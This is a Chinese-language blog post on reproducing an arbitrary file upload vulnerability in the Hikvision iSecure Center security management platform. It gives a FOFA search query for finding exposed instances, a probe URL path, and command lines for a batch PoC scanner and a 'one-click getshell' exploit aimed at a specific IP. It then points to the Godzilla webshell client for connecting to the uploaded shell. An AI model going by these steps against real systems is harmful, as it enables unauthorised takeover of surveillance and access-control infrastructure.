海康威视综合安防管理平台任意文件上传

系统介绍

HIKVISION iSecure Center综合安防管理平台是一套"集成化"、"智能化"的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,公众号:web安全工具库,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于"统一软件技术架构"先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。

影响范围

iSecure Center(V1.0.0 - V1.7.0 )

复现环境

FOFA:app="HIKVISION-iSecure-Center"

漏洞复现

ip:port/center/api/files;.js

若出现此页面,则可能存在漏洞

工具快速复现

poc采用无害化扫描检测,无文件残留,可批量检测;exp只做单个url攻击,一键shell

GitHub - xwna/HIKVISION_iSecure_Center-RCE: HIKVISION iSecure Center RCE 海康威视综合安防管理平台任意文件上传 POC&EXP(一键getshell)

POC:

python3 iSecure-Center-RCE_POC.py -f URL.txt

EXP:

python3 iSecure-Center-RCE_EXP.py -u https://182.19.10.99

通过哥斯拉工具连接

下载

GitHub - BeichenDream/Godzilla: 哥斯拉

还可以通过手工修改数据包方式上传。

相关推荐
lypzcgf30 分钟前
Coze源码分析-资源库-创建知识库-基础设施/存储/安全
安全·go·coze·coze源码分析·智能体平台·ai应用平台·agent开发平台
阿部多瑞 ABU32 分钟前
《学校机房终端安全全链条攻防分析与防御体系建设报告》
网络·安全
汉堡包0011 小时前
【靶场练习】--DVWA第一关Brute Force(暴力破解)全难度分析
学习·安全
Suckerbin10 小时前
TBBT: FunWithFlags靶场渗透
笔记·安全·web安全·网络安全
Lz__Heng11 小时前
信息安全工程师考点-网络安全法律与标准
安全·软考·信息安全工程师
独行soc15 小时前
2025年渗透测试面试题总结-67(题目+回答)
网络·python·安全·web安全·网络安全·adb·渗透测试
KKKlucifer21 小时前
国家网络安全通报中心:重点防范境外恶意网址和恶意 IP
tcp/ip·安全·web安全
wanhengidc21 小时前
手机云服务是什么意思?
运维·网络·安全·游戏·智能手机
TG_yilongcloud1 天前
阿里云国际代理:怎么保障数据库在凭据变更过程中的安全与稳定?
数据库·安全·阿里云·云计算
JialBro1 天前
S7-200 SMART PLC 安全全指南:配置、漏洞解析与复现防护
安全·plc·工控安全·西门子